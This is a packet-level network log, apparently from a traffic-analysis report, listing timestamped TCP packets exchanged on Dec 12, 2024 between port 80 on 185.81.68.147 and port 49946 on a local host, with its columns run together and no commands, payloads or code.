                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.629471064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.629596949 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.629776001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.630116940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.630224943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.630819082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.631705046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.631865025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.631874084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.631881952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.631936073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.632863998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.633373976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.633477926 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.633997917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.634008884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.634196997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.634901047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.635394096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.635536909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.635942936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.635992050 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.636118889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.636934042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.636943102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.637058020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.637953997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.638055086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.638978004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.638989925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.638998032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.639053106 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.639939070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.640021086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.640090942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.641006947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.641599894 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.642102003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.642110109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.642138004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.642184019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.643011093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.643827915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.644002914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.644064903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.644130945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.645062923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.645070076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.645241976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.646229029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.646320105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.647294998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.647301912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.647341967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.647372961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.648287058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.648401022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.648633003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.649413109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.649693012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.650111914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.650727987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.650851965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.651144981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.651837111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.652024031 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.652066946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.652996063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.653131962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.653517008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.654079914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.654087067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.654175043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.655031919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.655109882 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.655255079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.656109095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.656158924 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.656750917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.656932116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.656991005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.657048941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.657885075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.657934904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.658009052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.658848047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.659068108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.659686089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.659693956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.659722090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.659744024 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.660482883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.660559893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.660588026 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.661588907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.661955118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.662458897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.662467003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.662522078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.662543058 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.663336039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.663407087 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.663484097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.664279938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.664323092 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.665313959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.665321112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.665328026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.665378094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.806654930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.806741953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.806845903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.807065964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.807254076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.807337046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.808084965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.808191061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.808327913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.809230089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.810100079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.810113907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.810153961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.810208082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.810412884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.811120987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.811132908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.811192036 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.812146902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.813162088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.813174009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.813210964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.813211918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.813421965 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.814225912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.814240932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.814296961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.815190077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.815325975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.815376997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.816239119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.816945076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.816993952 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.817157984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.818245888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.818258047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.818280935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.818312883 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.818346977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.819272041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.819937944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.819991112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.820245028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.821253061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.821295977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.821310043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.821315050 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.821369886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.822463989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.822700024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.822781086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.823359966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.823373079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.823426008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.824311972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.825330019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.825340986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.825372934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.825382948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.825536966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.826342106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.826575994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.826647043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.827357054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.827507019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.827564001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.828351021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.828700066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.828883886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.829394102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.829716921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.829792976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.830400944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.830647945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.830694914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.831666946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.831732035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.831787109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.832420111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.832658052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.832719088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.833457947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.833559036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.833611012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.834458113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.834582090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.834628105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.835460901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.835618973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.835660934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.836447954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.837050915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.837097883 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.837553978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.837564945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.837616920 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.838561058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.838695049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.838747025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.839565039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.839975119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.840015888 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.840513945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.841106892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.841159105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.841563940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.841603994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.841655016 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.842566013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.842919111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.843024969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.843640089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.843770027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.843822956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.844608068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.845010042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.845134020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.845613003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.845782995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.845832109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.846637011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.846940994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.846991062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.847670078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.847795963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.847853899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.848674059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.848759890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.849076986 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.849706888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.849900007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.849955082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.850739002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.850939035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.851221085 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.851823092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.852082968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.852139950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.852920055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.853037119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.853091955 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.854037046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.854758978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.854820013 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.855061054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.855202913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.855251074 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.855926991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:50.856153965 CET8049946185.81.68.147192.168.2.10
